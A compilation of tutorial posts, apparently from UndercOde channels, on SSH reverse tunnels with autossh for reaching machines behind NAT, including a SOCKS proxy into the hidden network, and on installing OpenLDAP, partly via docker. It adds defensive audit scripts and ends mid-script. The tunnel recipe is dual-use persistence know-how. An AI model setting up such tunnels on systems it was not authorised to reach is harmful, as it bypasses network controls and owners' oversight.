β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Intranet penetration using SSH reverse tunnel
instagram.com/UndercOdeTestingCompany
1) Whether you are on an engagement or just administering your own machines, getting into an intranet is a key step. A host that only has a private intranet IP cannot be reached from the Internet, so this article shows how to use an SSH reverse tunnel on Linux to get in.
2) Suppose two machines A and B: A has a public IP, and B sits behind NAT with no port forwarding available.
3) Now I want to open an SSH connection from A to B. Because B is behind NAT there is no public IP + port combination that reaches it, so A cannot get through the NAT on its own. This article deals with exactly that situation, which is the one most people run into.
π¦ Let's first assume the following machines:
Machine  Position         Address    Account  ssh/sshd port  Runs sshd?
A        Public network   a.site     usera    22             Yes
B        Behind NAT       localhost  userb    22             Yes
C        Behind NAT       localhost  userc    22             No
SSH reverse tunnel connection
4) B actively opens an SSH connection to A and asks A to forward its port 6766 back to port 22 on B. As long as that connection stays up the forwarding works: connecting to port 6766 on A reaches sshd on B.
5) First open the tunnel from B, forwarding port 6766 on A to port 22 on B:
> B $ ssh -p 22 -qngfNTR 6766:localhost:22 usera@a.site
(-q quiet, -n no stdin, -f go to the background, -N run no remote command, -T no tty, -R the reverse forward. Note that -g only affects local -L/-D forwards; whether port 6766 on A is bound to loopback or to all of A's interfaces is decided by the GatewayPorts setting of sshd on A, not by this flag.)
Then, on A, SSH into B through port 6766:
> A $ ssh -p 6766 userb@localhost
That is really all there is to it.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Maintenance of the tunnel
> Stability maintenance
1) Unfortunately the SSH connection does not live forever: idle connections time out, NAT mappings expire and networks flap. Once the connection drops the tunnel is gone, and A can no longer reach B through it.
2) So we need a way to keep the tunnel up.
3) One of the simplest is autossh, which starts ssh, monitors the connection and restarts it when it dies. On Arch Linux it is installed with:
> $ sudo pacman -S autossh
4) Now do the same thing on B as before, except that the tunnel is kept alive by autossh:
> B $ autossh -p 22 -M 6777 -NR 6766:localhost:22 usera@a.site
5) The port given with -M is a monitoring port: autossh uses it and the port above it (6778) to send test traffic through the tunnel and detect when the connection has gone dead. It has nothing to do with the 6766 forwarding. A common alternative is -M 0 together with -o ServerAliveInterval=30 -o ServerAliveCountMax=3, which lets ssh itself detect the dead connection and leaves autossh only the job of restarting it.
> Then you can reach B through port 6766 on A:
> A $ ssh -p 6766 userb@localhost
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Two machines, each behind its own NAT, reach each other over SSH through a machine on the public network (what follows is an SSH relay over TCP through A, not UDP hole punching in the strict sense)
T.me/UndercOdeTesting
1) Here is how to connect from C to B using the same SSH reverse tunnel.
2) First edit sshd's configuration file /etc/ssh/sshd_config on A and turn on the GatewayPorts switch:
> GatewayPorts yes
Then restart sshd:
> A $ sudo systemctl restart sshd
With GatewayPorts no (the default) the reverse-forwarded port on A is bound to loopback only; with yes it is bound on all of A's interfaces, so anyone who can reach a.site:6766 can now knock on sshd on B. Use GatewayPorts clientspecified if you want B to choose per tunnel instead of opening this up for every user of A.
Then slightly modify the autossh command used on B so that the forwarded port binds on all interfaces:
> B $ autossh -p 22 -M 6777 -NR '*:6766:localhost:22' usera@a.site
Then, on C, connect to B through port 6766 on A:
> C $ ssh -p 6766 userb@a.site
3) That's it: you have gone through two layers of NAT.
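The difference between the first post (port 6766 on A bound to loopback, GatewayPorts no) and the GatewayPorts change just made is easy to get wrong, so here is an added example, not part of the original posts, of how to verify it on A: a POSIX shell function that reads the output of `ss -ltn` and reports whether the tunnel port is absent, loopback-only, or exposed on the network. The two `ss` listings below are constructed for the example; the port number 6766 is the one used throughout these posts.

```shell
#!/bin/sh
# Added example: classify how the reverse-forwarded port is exposed on A.
# Input: the output of `ss -ltn` (run on A) on stdin; $1 is the tunnel port.
# Prints one word: absent   (nothing listens on that port)
#                  loopback (bound to 127.0.0.1 / [::1] only: GatewayPorts no)
#                  exposed  (bound to 0.0.0.0, [::], * or a real interface address)
set -f   # no filename globbing: ss prints patterns such as 0.0.0.0:* that we word-split below

tunnel_exposure() {
    port="$1"
    result=absent
    while IFS= read -r line || [ -n "$line" ]; do
        set -- $line                           # split the ss columns on whitespace
        [ "$1" = "LISTEN" ] || continue        # skip the header and non-listening rows
        case "$4" in                           # 4th column is Local Address:Port
            *:"$port") ;;
            *) continue ;;
        esac
        addr="${4%:*}"                         # strip the ':port' suffix
        case "$addr" in
            127.0.0.1|'[::1]')
                [ "$result" = exposed ] || result=loopback ;;
            *)  result=exposed ;;              # wildcard or a real interface address
        esac
    done
    echo "$result"
}

# Constructed `ss -ltn` listings (not captured from a real host).
# Before GatewayPorts yes: sshd bound 6766 to loopback only.
SS_LOOPBACK_ONLY='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
LISTEN 0      128    127.0.0.1:6766     0.0.0.0:*
LISTEN 0      128    [::1]:6766         [::]:*'

# After GatewayPorts yes and -R '*:6766:localhost:22': reachable from anywhere.
SS_EXPOSED='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
LISTEN 0      128    0.0.0.0:6766       0.0.0.0:*
LISTEN 0      128    [::]:6766          [::]:*'

# Typical use on A:  ss -ltn | tunnel_exposure 6766
printf 'before GatewayPorts: %s\n' "$(printf '%s\n' "$SS_LOOPBACK_ONLY" | tunnel_exposure 6766)"
printf 'after GatewayPorts:  %s\n' "$(printf '%s\n' "$SS_EXPOSED" | tunnel_exposure 6766)"
```

If the answer is "exposed" on a host that was supposed to keep the tunnel private, either switch A back to GatewayPorts no (or clientspecified) or drop the leading `*:` from the -R argument on B, and in any case restrict the key used for the tunnel in A's authorized_keys.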
4) Final solution
Putting the pieces above together, the final setup is as follows:
5) First turn on the GatewayPorts switch of sshd on A and restart sshd.
6) Then create a dedicated user autossh on B. Following the idea of least privilege, the autossh service on B runs as this user rather than as root or your own account, so that a compromise of the tunnel process exposes as little as possible:
> B $ sudo useradd -m autossh
> B $ sudo passwd autossh
Then create an SSH key for the autossh user on B and upload it to A:
> B $ su - autossh
> B $ ssh-keygen -t rsa -C 'autossh@B'
> B $ ssh-copy-id usera@a.site
7) Do not set a passphrase on this key: just press Enter at every ssh-keygen prompt. The service has to start unattended, and a passphrase would block it. Remember what that means: anyone who obtains /home/autossh/.ssh/id_rsa from B can log in to A as usera, so restrict this key in A's authorized_keys to port forwarding only.
8) Then create a systemd unit on B that runs autossh as the autossh user. Write the following into /lib/systemd/system/autossh.service (/etc/systemd/system is the usual place for locally written units) and set its permissions to 644:
[Unit]
Description=Auto SSH Tunnel
After=network-online.target

[Service]
User=autossh
Type=simple
ExecStart=/bin/autossh -p 22 -M 6777 -i /home/autossh/.ssh/id_rsa -NR '*:6766:localhost:22' usera@a.site
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=always

[Install]
WantedBy=multi-user.target
WantedBy=graphical.target
Note that -i must come before the host name. Placed after it, as in many copies of this recipe, ssh treats it as the remote command and silently drops it because of -N; the key is then only picked up because it happens to sit at the default path for that user.
Make network-online.target actually wait for the network on B by enabling the wait-online unit of your network manager:
9) B $ sudo systemctl enable NetworkManager-wait-online
If you use systemd-networkd, the corresponding unit is systemd-networkd-wait-online. Then enable the service so that it starts at boot:
> B $ sudo systemctl enable autossh
If you like, start it right away as well:
> B $ sudo systemctl start autossh
Then, on A, SSH to B through the reverse tunnel:
> A $ ssh -p 6766 userb@localhost
Or SSH from C to B directly through both layers of NAT:
> C $ ssh -p 6766 userb@a.site
If you are familiar with ssh you can do more with this tunnel. For example, add dynamic port forwarding when connecting back, which opens a SOCKS proxy on port 7677 of C whose traffic leaves from B, giving C access to the whole intranet behind B's NAT:
> C $ ssh -p 6766 -qngfNTD 7677 userb@a.site
Here -g does matter: it makes that SOCKS port reachable from other hosts on C's network, so drop it unless that is intended.
Written by Underc0de
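The passphrase-less autossh key from step 7 is the weak point of this design: whoever copies it off B gets a normal shell on A as usera. As an added example, not part of the original post, the POSIX shell snippet below writes the authorized_keys entry on A the way a practitioner would, locked down to the one reverse forward the tunnel needs, and audits an existing authorized_keys file for tunnel keys that lack those restrictions. It assumes OpenSSH 7.8 or newer on A (for permitlisten), the port 6766 and the key comment autossh@B used in the posts above; the public key in the sample is a placeholder, not a real key.

```shell
#!/bin/sh
# Added example: restrict the autossh key on A to reverse port forwarding only.
# Assumes OpenSSH >= 7.8 on A (restrict needs 7.2, permitlisten needs 7.8).

TUNNEL_PORT=6766

# Print the authorized_keys line for one public key ($1: a full "type base64 comment" line).
#   command="/bin/false" : a session request runs nothing useful (autossh uses -N anyway)
#   restrict             : no pty, no agent/X11 forwarding, no ~/.ssh/rc, no port forwarding...
#   port-forwarding      : ...except port forwarding, which is re-enabled here
#   permitlisten=PORT    : and only a -R bind to this port (any bind address) is accepted
restricted_entry() {
    printf 'command="/bin/false",restrict,port-forwarding,permitlisten="%s" %s\n' \
        "$TUNNEL_PORT" "$1"
}

# Audit an authorized_keys file read from stdin: every key whose comment
# contains $1 must carry both restrict and permitlisten. Prints the offenders
# and returns 1 if any were found, 0 otherwise.
audit_tunnel_keys() {
    comment="$1"
    bad=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*) continue ;; esac         # blank lines and comments
        case "$line" in *"$comment"*) ;; *) continue ;; esac
        case "$line" in
            *restrict*permitlisten=*|*permitlisten=*restrict*) ;;
            *) printf 'unrestricted tunnel key: %s\n' "$line"; bad=1 ;;
        esac
    done
    return "$bad"
}

# Constructed placeholder key (not a real key), as ssh-copy-id would have installed it.
SAMPLE_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7placeholderkeyforthisexample autossh@B'

# What ssh-copy-id left in ~usera/.ssh/authorized_keys on A, and the line to replace it with:
printf '%s\n' "$SAMPLE_KEY" | audit_tunnel_keys autossh@B || echo "-> replace it with:"
restricted_entry "$SAMPLE_KEY"
```

With the restricted line in place the tunnel works exactly as before, but `ssh -i id_rsa usera@a.site` with that key yields no shell and a -R to any port other than 6766 is refused by sshd. For the systemd unit, also consider Environment=AUTOSSH_GATETIME=0, so that autossh keeps retrying when the very first connection attempt at boot fails instead of giving up.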
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to set up a basic OpenLDAP server (full) by Underc0de
> How to install and set up OpenLDAP as a centralised e-mail address book server for client queries within a company. OpenLDAP is used in many other areas too, such as centralised user account authentication, but the e-mail address book is the most common use.
instagram.com/UndercOdeTestingCompany
π¦ Let's start:
1) Download the latest OpenLDAP package from www.openldap.org, then compile and install it with the usual steps:
#tar xvfz openldap-stable-20010524.tgz
#cd openldap-2.0.11
#./configure
#make depend
#make
#make test
#make install
2) My environment is Red Hat 6.1. If no errors occur, the LDAP daemon slapd is installed by default in /usr/local/libexec; the configuration files go in /usr/local/etc/openldap/; the OpenLDAP tools ldapadd, ldapdelete, ldapmodify, ldapmodrdn, ldappasswd and ldapsearch go in /usr/local/bin; and the runtime database lives in /usr/local/var/openldap-ldbm.
π¦ Settings
1) Edit the configuration file /usr/local/etc/openldap/slapd.conf
and add the following lines after the include /usr/local/etc/openldap/schema/core.schema line to pull in all the schemas (for a plain address book only cosine.schema and inetorgperson.schema are needed on top of core.schema; inetorgperson depends on cosine):
include /usr/local/etc/openldap/schema/corba.schema
include /usr/local/etc/openldap/schema/cosine.schema
include /usr/local/etc/openldap/schema/inetorgperson.schema
include /usr/local/etc/openldap/schema/java.schema
include /usr/local/etc/openldap/schema/krb5-kdc.schema
include /usr/local/etc/openldap/schema/misc.schema
include /usr/local/etc/openldap/schema/nadf.schema
include /usr/local/etc/openldap/schema/nis.schema
include /usr/local/etc/openldap/schema/openldap.schema
2) In the "ldbm database definitions" section of slapd.conf, change the suffix and rootdn lines as follows:
database ldbm
suffix "o=yourdomain,c=us"
rootdn "cn=root,o=yourdomain,c=us"
rootpw secret
directory /usr/local/var/openldap-ldbm
> The suffix can take several forms; here o=yourdomain,c=us encodes your company's domain name and country or region. The rootdn after installation defaults to cn=Manager; changing it to root is purely a matter of taste, in line with the Unix/Linux tradition that root has the highest privileges. Note that rootpw as written above is the directory superuser's password in cleartext: generate a hashed value with slappasswd and paste its {SSHA}... output in place of "secret", and keep slapd.conf readable by root only (chmod 600).
3) Now start slapd by running /usr/local/libexec/slapd.
Consider adding /usr/local/bin and /usr/local/libexec to your search path by extending the PATH line in /etc/profile:
PATH="$PATH:/usr/X11R6/bin:/usr/local/bin:/usr/local/libexec"
so that after your next login you only need to type slapd.
4) Test whether the LDAP server is working.
Run the following command and check that it produces output:
#ldapsearch -x -b "o=yourdomain,c=us" "(objectclass=*)"
(-x is an anonymous simple bind. With no access directives in slapd.conf the default policy lets anyone read everything and only the rootdn write, which is fine for an address book but means the whole directory is readable by anyone who can reach port 389.)
5) Write an .ldif text file and load it into the LDAP database with ldapadd.
The file looks like this (entries are separated by a blank line):
dn: o=yourdomain,c=us
objectClass: dcObject
objectClass: organization
o: yourdomain
dc: yourdomain

dn: cn=jephe Wu,o=yourdomain,c=us
objectClass: inetOrgPerson
cn: jephe Wu
sn: Wu
mail: jephe_wu@yourdomain.com

...... more users ......
1) and so on: one such entry per person goes into this file. Note that the object class inetOrgPerson requires at least cn and sn. Here we use three attributes, cn, sn and mail, which is enough for an e-mail address book. You can also add things like mobile, homePhone, pager and so on.
2) Then load the .ldif file into the LDAP database with:
#ldapadd -x -D "cn=root,o=yourdomain,c=us" -w secret -f "yourldiffilename"
(-w puts the rootdn password on the command line, where every user on the machine can see it in ps; use -W to be prompted instead.)
Note: the first entry above, dn: o=yourdomain,c=us, is required, since it is the suffix itself; without it none of the other entries can be added. Replace "yourdomain" above with your company's domain name.
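Hand-writing LDIF as above goes wrong as soon as a name contains a comma, a non-ASCII letter or a leading colon: the DN syntax (RFC 4514) needs certain characters escaped, and LDIF (RFC 2849) needs such values base64-encoded in the `::` form, otherwise ldapadd rejects the entry or, worse, creates a different DN from the one you intended. As an added example, not part of the original post, the POSIX shell helpers below generate a correct inetOrgPerson entry for the address book from a given name, surname and mail address, applying both rules; they need only sed and the coreutils base64 command. The sample people are made up for the example.

```shell
#!/bin/sh
# Added example: generate address-book LDIF entries with correct DN escaping
# (RFC 4514) and LDIF value encoding (RFC 2849). Needs sed and base64.
export LC_ALL=C   # [:print:] then means printable ASCII, so UTF-8 bytes count as non-printable

# Escape one attribute value for use inside a DN: backslash first, then the
# special characters , + " < > ; and a leading '#' or a leading/trailing space.
dn_escape() {
    printf '%s\n' "$1" | sed \
        -e 's/\\/\\\\/g' \
        -e 's/[,+"<>;]/\\&/g' \
        -e 's/^#/\\#/' \
        -e 's/^ /\\ /' \
        -e 's/ $/\\ /'
}

# Emit "name: value", or "name:: base64" when the value cannot be written
# literally in LDIF (leading space, ':' or '<', trailing space, or any byte
# outside printable ASCII, e.g. accented letters in UTF-8).
ldif_attr() {
    case "$2" in
        ' '*|':'*|'<'*|*' '|*[![:print:]]*)
            printf '%s:: %s\n' "$1" "$(printf '%s' "$2" | base64 | tr -d '\n')" ;;
        *)
            printf '%s: %s\n' "$1" "$2" ;;
    esac
}

# Emit one inetOrgPerson entry under base DN $1 for given name $2, surname $3, mail $4.
person_ldif() {
    cn="$2 $3"
    printf 'dn: cn=%s,%s\n' "$(dn_escape "$cn")" "$1"
    printf 'objectClass: inetOrgPerson\n'
    ldif_attr cn "$cn"
    ldif_attr sn "$3"
    ldif_attr mail "$4"
    echo                                   # entries are separated by a blank line
}

# Constructed sample people (made up for this example). Pipe the output into:
#   ldapadd -x -D "cn=root,o=yourdomain,c=us" -W
BASE='o=yourdomain,c=us'
person_ldif "$BASE" 'jephe' 'Wu' 'jephe_wu@yourdomain.com'
person_ldif "$BASE" 'Anna' 'Müller' 'anna.mueller@yourdomain.com'     # non-ASCII surname -> sn:: base64
person_ldif "$BASE" 'Smith, Jr.' 'John' 'john.smith@yourdomain.com'   # comma in the cn -> escaped in the DN
```

The same escaping rule is what protects a directory from LDAP injection when user-supplied names are turned into DNs or search filters by an application, so it is worth applying from the start rather than only when a comma first breaks an import.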
3) Configure Outlook Express to look up e-mail addresses on the LDAP server.
> Go to "Tools / Accounts / Add / Directory Service", fill in your server's IP address or the host's full domain name, answer Yes on the next screen so that addresses are checked against this directory, then select the entry you just created under "Directory Service", open "Properties / Advanced" and enter
"o=yourdomain,c=us" as the "Search Base".
4) Netscape: set the corresponding options based on the information above.
π¦ Common usage problems
1) slapd starts fine, but nothing can be added to the database: ldapadd fails with "ldap_bind: Can't contact LDAP server".
Answer: the most likely cause is that /etc/hosts has no "127.0.0.1 localhost" entry.
2) Mind the lookup order: if the local address book of Outlook Express has entries, it is consulted first when checking addresses, and the LDAP server is only queried when no matching local record exists.
3) Use the following command to confirm that the client and the LDAP server are actually talking to each other. Run it on the server, then check an address in OE, and you will see the client's connection to and queries against the LDAP database. Because plain LDAP on port 389 is not encrypted, the same capture shows every query and any password sent in a simple bind to anyone on the path, which is the reason to move to TLS once the setup works.
# tcpdump port 389
That's it.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ OpenLDAP features > ALL
fb.com/UndercOdeTestingCompany
π¦ Let's start:
1) OpenLDAP is an open-source, cross-platform implementation of LDAP, a standard Internet protocol derived from the X.500 directory standard.
2) OpenLDAP serves mostly static data that is read far more often than it is written; it is queried with search filters rather than maintained through SQL statements as a relational database would be.
3) OpenLDAP replicates data between nodes with push and pull mechanisms (syncrepl), and provides security based on TLS and SASL, giving encrypted transport and authentication mechanisms that include Kerberos.
4) OpenLDAP can be load-balanced (LVS, HAProxy) and made highly available with third-party open-source software such as Heartbeat, Corosync and Keepalived, so that the authentication service stays up around the clock.
5) OpenLDAP's data is expressed as plain text (LDIF files) rather than a binary format, which makes directory entries easy to maintain and manage.
6) OpenLDAP centralises user authentication and management: account changes are made once on the OpenLDAP server instead of on every client, and take effect everywhere.
7) OpenLDAP speaks a simple protocol over TCP/IP to transfer entry data; entries are read and written through search and modify operations, and the transport can be encrypted (LDAPS or StartTLS).
8) OpenLDAP is used by major application platforms (Nginx, HTTP servers, vsftpd, Samba, SVN, Postfix, OpenStack, Hadoop and so on), by server consoles (HP, IBM, Dell) and by storage consoles (EMC, NetApp) for account management and authentication, giving unified account management.
9) OpenLDAP deployments are low cost, simple to configure, powerful, easy to manage and open source.
OpenLDAP uses ACLs (access control lists) to control precisely which users may access which data, protecting the directory's contents.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Install OpenLDAP using docker
Installing OpenLDAP with docker is very simple.
pinterest.com/UndercOdeOfficial
π¦ Let's start:
1) Run the following command to bring up an OpenLDAP server quickly:
> docker run -p 389:389 -p 636:636 --name my-openldap-container --detach osixia/openldap:1.2.2
2) Parameter explanation:
-p 389:389 publishes the container's port 389 (LDAP, with StartTLS available) on the host's port 389
-p 636:636 publishes the container's port 636 (LDAPS) on the host's port 636 (the image listens on 389 and 636; 689 is not an LDAP port)
--name my-openldap-container names the docker container 'my-openldap-container'
--detach runs it in the background
osixia/openldap:1.2.2 is the image to run
3) After this command an OpenLDAP service is up. Note that it is reachable on every interface of the host and uses the image's default credentials (admin / config) until you override them with the environment variables below; do not leave it like this on anything but a private test machine.
4) Run the following command to test if the service started successfully:
> docker exec my-openldap-container ldapsearch -x -H ldap://localhost -b dc=example,dc=org -D "cn=admin,dc=example,dc=org" -w admin
5) If you get a return value similar to the following text, the service started successfully.
# extended LDIF
#
# LDAPv3
# base <dc=example,dc=org> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
[...]
# numResponses: 3
# numEntries: 2
π¦ OpenLDAP environment variables
1) Initial values are passed with --env when the container is started, for example:
> docker run --env LDAP_ORGANISATION="My company" --env LDAP_DOMAIN="my-company.com" \
--env LDAP_ADMIN_PASSWORD="JonSn0w" --detach osixia/openldap:1.2.2
2) The common environment variables are:
LDAP_ORGANISATION: organisation name. Default: Example Inc.
LDAP_DOMAIN: LDAP domain. Default: example.org
LDAP_BASE_DN: LDAP base DN. If empty it is derived from LDAP_DOMAIN. Default: (empty)
LDAP_ADMIN_PASSWORD: LDAP administrator password. Default: admin
LDAP_CONFIG_PASSWORD: password for the cn=config database. Default: config
LDAP_READONLY_USER: add a read-only user. Default: false
LDAP_READONLY_USER_USERNAME: read-only user name. Default: readonly
LDAP_READONLY_USER_PASSWORD: read-only user password. Default: readonly
π¦ The TLS-related environment variables are:
LDAP_TLS: add TLS support to OpenLDAP. Cannot be removed once set to true. Default: true
LDAP_TLS_CRT_FILENAME: LDAP SSL certificate file name. Default: ldap.crt
LDAP_TLS_KEY_FILENAME: LDAP SSL certificate private key file name. Default: ldap.key
LDAP_TLS_CA_CRT_FILENAME: LDAP SSL CA certificate file name. Default: ca.crt
LDAP_TLS_ENFORCE: require TLS for every connection except ldapi. Cannot be disabled once set to true. Default: false (so out of the box a simple bind on port 389 sends the password in cleartext unless the client starts TLS itself)
LDAP_TLS_CIPHER_SUITE: TLS cipher suite. Default: SECURE256:+SECURE128:-VERS-TLS-ALL:+VERS-TLS1.2:-RSA:-DHE-DSS:-CAMELLIA-128-CBC:-CAMELLIA-256-CBC, based on Red Hat's TLS hardening guide
LDAP_TLS_VERIFY_CLIENT: TLS client certificate verification. Default: demand
π¦ The replication-related environment variables are:
1) LDAP_REPLICATION: enable OpenLDAP replication. Default: false
LDAP_REPLICATION_CONFIG_SYNCPROV: olcSyncRepl options used for the config database, without the rid and provider, which are added automatically from LDAP_REPLICATION_HOSTS. Default: binddn="cn=admin,cn=config" bindmethod=simple credentials=$LDAP_CONFIG_PASSWORD searchbase="cn=config" type=refreshAndPersist retry="60 +" timeout=1 starttls=critical
2) LDAP_REPLICATION_DB_SYNCPROV: olcSyncRepl options used for the main database, again without the rid and provider, which are added automatically from LDAP_REPLICATION_HOSTS. Default: binddn="cn=admin,$LDAP_BASE_DN" bindmethod=simple credentials=$LDAP_ADMIN_PASSWORD searchbase="$LDAP_BASE_DN" type=refreshAndPersist interval=00:00:00:10 retry="60 +" timeout=1 starttls=critical
3) LDAP_REPLICATION_HOSTS: the list of replication hosts; it must include the current container's own host name, set with --hostname on the docker run command. Default:
- ldap://ldap.example.org
- ldap://ldap2.example.org
π¦ Install openLDAP using docker
Installing openLDAP using docker is very simple.
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Run the following command to quickly set up an openLDAP server:
> docker run -p 389:389 -p 689:689 --name my-openldap-container --detach osixia/openldap:1.2.2
2) Parameter explanation:
-p 389:389 Exposing the container's port 389 to the host's port 389
-p 689:689 Exposing container's port 689 to the host's port 689
--name my-openldap-container Name the docker container 'my-openldap-container'
--detach Background process
osixia/openldap:1.2.2 Image name to run
3) After running the above command, an openLDAP service has been created.
4) Run the following command to test if the service started successfully:
> docker exec my-openldap-container ldapsearch -x -H ldap://localhost -b dc=example,dc=org -D "cn=admin,dc=example,dc=org" -w admin
5) If you get a return value similar to the following text, the service started successfully.
# extended LDIF
#
# LDAPv3
# base <dc=example,dc=org> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
[...]
# numResponses: 3
# numEntries: 2
π¦ openLDAP environment variable
1) By --env ]setting the initial values to start the service openLDAP containers, for example:
> docker run --env LDAP_ORGANISATION="My company" --env LDAP_DOMAIN="my-company.com" \
--env LDAP_ADMIN_PASSWORD="JonSn0w" --detach osixia/openldap:1.2.2
2) The common environment variables are as follows:
LDAP_ORGANISATIONname of association. Default is Example Inc.
LDAP_DOMAINLdap domain. Default is example.org
LDAP_BASE_DNLdap base DN. If empty, it is automatically set from the LDAP_DOMAIN value. Default is (empty)
LDAP_ADMIN_PASSWORDLdap administrator password. Default is admin
LDAP_CONFIG_PASSWORDLdap configuration password. Default is config
LDAP_READONLY_USERAdd read-only users. Default is false
LDAP_READONLY_USER_USERNAMERead-only username. Readonly by default
LDAP_READONLY_USER_PASSWORDRead-only user password. Readonly by default
π¦ The environment variables related to TLS are as follows:
LDAP_TLS : add TLS support to openldap. Cannot be removed once set to true. The default is true.
LDAP_TLS_CRT_FILENAME : LDAP SSL certificate file name. Default is ldap.crt
LDAP_TLS_KEY_FILENAME : LDAP SSL certificate private key file name. Default is ldap.key
LDAP_TLS_CA_CRT_FILENAME : LDAP SSL CA certificate file name. Default is ca.crt
LDAP_TLS_ENFORCE : enforce TLS for every connection except ldapi. Cannot be disabled once set to true. The default is false, so plain ldap:// binds (like the ldapsearch test above, which sent the admin password unencrypted) remain accepted until you set it to true.
LDAP_TLS_CIPHER_SUITE : TLS cipher suite (a GnuTLS priority string). The default is SECURE256:+SECURE128:-VERS-TLS-ALL:+VERS-TLS1.2:-RSA:-DHE-DSS:-CAMELLIA-128-CBC:-CAMELLIA-256-CBC, based on Red Hat's TLS hardening guide
LDAP_TLS_VERIFY_CLIENT : TLS client certificate verification (olcTLSVerifyClient). Default is demand
π¦ The environment variables related to replication are as follows:
1) LDAP_REPLICATION : add openldap replication. The default is false
LDAP_REPLICATION_CONFIG_SYNCPROV : the olcSyncRepl option used for the config database. rid and provider are not part of this value; they are added automatically from LDAP_REPLICATION_HOSTS. The default is:
> binddn="cn=admin,cn=config" bindmethod=simple credentials=$LDAP_CONFIG_PASSWORD searchbase="cn=config" type=refreshAndPersist retry="60 +" timeout=1 starttls=critical
2) LDAP_REPLICATION_DB_SYNCPROV : the olcSyncRepl option for the data database. Again, rid and provider are added automatically from LDAP_REPLICATION_HOSTS. The default is:
> binddn="cn=admin,$LDAP_BASE_DN" bindmethod=simple credentials=$LDAP_ADMIN_PASSWORD searchbase="$LDAP_BASE_DN" type=refreshAndPersist interval=00:00:00:10 retry="60 +" timeout=1 starttls=critical
Note: both defaults bind with the admin passwords, so LDAP_ADMIN_PASSWORD and LDAP_CONFIG_PASSWORD must be identical on every replica, and starttls=critical means a consumer refuses to replicate unless the provider's certificate is trusted (the CA file named by LDAP_TLS_CA_CRT_FILENAME).
3) LDAP_REPLICATION_HOSTS : the list of replication hosts. It must contain the current container's own host name, which is set with --hostname on the docker run command. The default is:
- ldap://ldap.example.org
- ldap://ldap2.example.org
4) To set this variable on the docker run command line, prefix the value with the tag #PYTHON2BASH: and write the list in Python syntax; the image converts it to its YAML form:
docker run --env LDAP_REPLICATION_HOSTS="#PYTHON2BASH:['ldap://ldap.example.org','ldap://ldap2.example.org']" --detach osixia/openldap:1.2.2
5) Other environment variables are as follows:
KEEP_EXISTING_CONFIG : do not change the ldap configuration. The default is false. If set to true, the existing configuration (the slapd.d directory) is left untouched: the image's TLS setup, LDAP_ADMIN_PASSWORD and LDAP_CONFIG_PASSWORD, the bootstrap ldif/schema and the replication config are not applied.
LDAP_REMOVE_CONFIG_AFTER_SETUP : delete the bootstrap configuration folder after setup. The default is true
6) LDAP_SSL_HELPER_PREFIX : ssl-helper environment variable prefix. The default is ldap; ssl-helper looks for its configuration in the LDAP_SSL_HELPER_* variables before falling back to the SSL_HELPER_* variables.
7) HOSTNAME : set the host name of the running openldap server. Defaults to the name generated by docker.
8) openLDAP data persistence
Add the following parameters to the docker run command so that the LDAP database and the LDAP configuration are stored outside the container. Pass the same two parameters the next time the container is re-created and the existing database is reused:
--volume /data/slapd/database:/var/lib/ldap \
--volume /data/slapd/config:/etc/ldap/slapd.d \
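The variables, defaults and bind mounts above are easy to get subtly wrong on a long docker run line (a password left at the image default, LDAP_TLS_ENFORCE forgotten, the container's own --hostname missing from LDAP_REPLICATION_HOSTS). The script below is an added example, not part of the original post or of the osixia image: it assembles the docker run command from a dictionary of environment variables, encodes the replication host list with the #PYTHON2BASH: tag, and reports weak settings before anything is started. The check names, the helper functions and the sample settings in main() are this example's own assumptions.

```python
"""Assemble and sanity-check the docker run line for osixia/openldap.

Added example, not part of the original post or of the osixia image. The
variable names, defaults and bind mounts are the ones documented above; the
weak-setting checks, the helper names and the sample settings in main() are
this example's own.
"""
import ast
import shlex
from urllib.parse import urlparse

IMAGE = "osixia/openldap:1.2.2"
PY2BASH_TAG = "#PYTHON2BASH:"

# Image defaults for secrets; anything still equal to these gets flagged.
SECRET_DEFAULTS = {
    "LDAP_ADMIN_PASSWORD": "admin",
    "LDAP_CONFIG_PASSWORD": "config",
    "LDAP_READONLY_USER_PASSWORD": "readonly",
}

# Bind mounts from the persistence section: database and slapd.d config.
VOLUMES = {
    "/data/slapd/database": "/var/lib/ldap",
    "/data/slapd/config": "/etc/ldap/slapd.d",
}


def python2bash(hosts):
    """Encode a list of provider URLs with the image's #PYTHON2BASH: tag."""
    return PY2BASH_TAG + "[" + ",".join(repr(h) for h in hosts) + "]"


def parse_hosts(value):
    """Decode LDAP_REPLICATION_HOSTS (tagged Python list or one URL per line)."""
    if value.startswith(PY2BASH_TAG):
        return [str(h) for h in ast.literal_eval(value[len(PY2BASH_TAG):])]
    return [line.strip() for line in value.splitlines() if line.strip()]


def lint_env(env, hostname=None):
    """Return human-readable findings for an env mapping bound for docker run."""
    findings = []
    for var, default in SECRET_DEFAULTS.items():
        if var == "LDAP_READONLY_USER_PASSWORD" and env.get("LDAP_READONLY_USER", "false").lower() != "true":
            continue  # no read-only user is created, so its password is irrelevant
        if env.get(var, default) == default:
            findings.append(f"{var} is left at the image default '{default}'")
    if env.get("LDAP_TLS", "true").lower() != "true":
        findings.append("LDAP_TLS is disabled; binds and replication travel in clear text")
    if env.get("LDAP_TLS_ENFORCE", "false").lower() != "true":
        findings.append("LDAP_TLS_ENFORCE is false; clients may still bind over plain ldap://")
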